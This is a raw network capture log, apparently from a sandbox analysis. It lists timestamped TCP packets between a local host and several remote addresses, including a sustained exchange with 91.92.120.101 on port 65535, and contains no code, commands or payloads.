Jun 19, 2025 12:58:35.402542114 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.402633905 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.403884888 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.403964043 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.404098988 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.404863119 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.404934883 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.405023098 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.405828953 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.405905962 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.406018019 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.406049013 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.406805992 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.406883001 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.406981945 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.408283949 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.408444881 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.408516884 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.408543110 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.408605099 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.409665108 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.409754992 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.409830093 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.410834074 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.410916090 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.411050081 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.411992073 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.412075043 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.412179947 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.412190914 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.413733006 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.413819075 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.413935900 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.414871931 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.414944887 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.415045023 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.416013002 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.416088104 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.416168928 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.417181015 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.417269945 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.417366982 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.417382002 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.418884039 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.418967009 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.419091940 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.419912100 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.419986963 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.420083046 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.420888901 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.420975924 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.421050072 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.421838999 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.421910048 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.421993971 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.422035933 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.435807943 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.435947895 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.436407089 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.436525106 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.574913025 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.575078964 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.575078964 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.575865984 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.575990915 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.576767921 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.576864004 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.583858967 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:35.584289074 CEST	443	49685	185.15.121.100	192.168.2.6
Jun 19, 2025 12:58:35.584357977 CEST	49685	443	192.168.2.6	185.15.121.100
Jun 19, 2025 12:58:37.046175957 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:37.358251095 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:37.811398983 CEST	49672	443	192.168.2.6	204.79.197.203
Jun 19, 2025 12:58:37.967643023 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:39.170996904 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:41.577023983 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:46.113702059 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.113744020 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.113820076 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.123250961 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.123264074 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.389539003 CEST	49678	443	192.168.2.6	20.42.65.91
Jun 19, 2025 12:58:46.415354013 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:58:46.501751900 CEST	80	49691	172.217.165.131	192.168.2.6
Jun 19, 2025 12:58:46.501869917 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:58:46.502032042 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:58:46.524432898 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.524585962 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.527508974 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.527523994 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.528084993 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.577052116 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.588269949 CEST	80	49691	172.217.165.131	192.168.2.6
Jun 19, 2025 12:58:46.588371038 CEST	80	49691	172.217.165.131	192.168.2.6
Jun 19, 2025 12:58:46.639548063 CEST	49691	80	192.168.2.6	172.217.165.131
Jun 19, 2025 12:58:46.646482944 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.646518946 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.646635056 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.647725105 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.648874998 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.648947001 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.651293039 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.696269989 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.781070948 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.827052116 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.909912109 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.909928083 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.909970045 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.909981012 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.909996986 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.909996986 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910022974 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.910036087 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.910038948 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910038948 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910043955 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.910056114 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.910072088 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910100937 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910108089 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:46.910130978 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.911787987 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:46.911837101 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:47.420799971 CEST	49672	443	192.168.2.6	204.79.197.203
Jun 19, 2025 12:58:47.479372978 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:47.479830027 CEST	443	49689	172.202.163.200	192.168.2.6
Jun 19, 2025 12:58:47.479876041 CEST	49689	443	192.168.2.6	172.202.163.200
Jun 19, 2025 12:58:48.291465044 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:48.492958069 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:48.493278980 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:48.494659901 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:48.693254948 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:48.733304977 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:48.953396082 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.191843987 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.192327976 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.428801060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.573473930 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574621916 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574754000 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574767113 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574790001 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.574793100 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574805975 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574821949 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574841976 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.574883938 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.574923038 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574937105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574949026 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.574973106 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.575385094 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.773209095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773228884 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773241043 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773255110 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773267031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773282051 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773297071 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773313046 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773327112 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773339987 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773351908 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773359060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773370028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773382902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773386955 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.773396015 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773411036 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773425102 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773433924 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.773439884 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773446083 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.773453951 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.773474932 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.773483992 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.827106953 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970586061 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970613003 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970623970 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970637083 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970650911 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970663071 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970676899 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970689058 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970701933 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970717907 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970730066 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970735073 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970743895 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970760107 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970772982 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970787048 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970796108 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970801115 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970814943 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970814943 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970830917 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970835924 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970844984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970858097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970870018 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970877886 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970885992 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970890999 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970899105 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970912933 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970925093 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970937967 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970942020 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970949888 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970963955 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970966101 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970983982 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.970984936 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.970999956 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971004009 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.971014023 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971026897 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971041918 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971048117 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.971057892 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971070051 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:49.971074104 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:49.971095085 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.014566898 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.024964094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.024990082 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.025031090 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171294928 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171317101 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171329021 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171348095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171361923 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171381950 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171391010 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171406984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171418905 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171423912 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171430111 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171438932 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171453953 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171466112 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171472073 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171478033 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171489954 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171493053 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171505928 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171516895 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171519995 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171534061 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171540976 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171554089 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171570063 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171581984 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171595097 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171603918 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171608925 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171631098 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171633959 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171648026 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171660900 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171672106 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171679020 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171693087 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171698093 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171706915 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171720028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171729088 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171734095 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171749115 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171756983 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171763897 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171777010 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171778917 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171796083 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171808958 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171818972 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171823978 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171843052 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171852112 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171855927 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171870947 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171880007 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171884060 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171895981 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171907902 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171920061 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171920061 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171936035 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171945095 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171948910 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171961069 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171962023 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.171976089 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171988964 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.171988964 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172003031 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172014952 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172028065 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172030926 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172040939 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172049046 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172053099 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172065020 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172065973 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172080994 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172091961 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172092915 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172106028 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172120094 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172125101 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172132969 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172142982 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172147989 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172161102 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172174931 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172175884 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172187090 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172194958 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172199965 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172211885 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172223091 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172224045 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172236919 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172262907 CEST	65535	49692	91.92.120.101	192.168.2.6
Jun 19, 2025 12:58:50.172266006 CEST	49692	65535	192.168.2.6	91.92.120.101
Jun 19, 2025 12:58:50.172295094 CEST	49692	65535	192.168.2.6	91.92.120.101
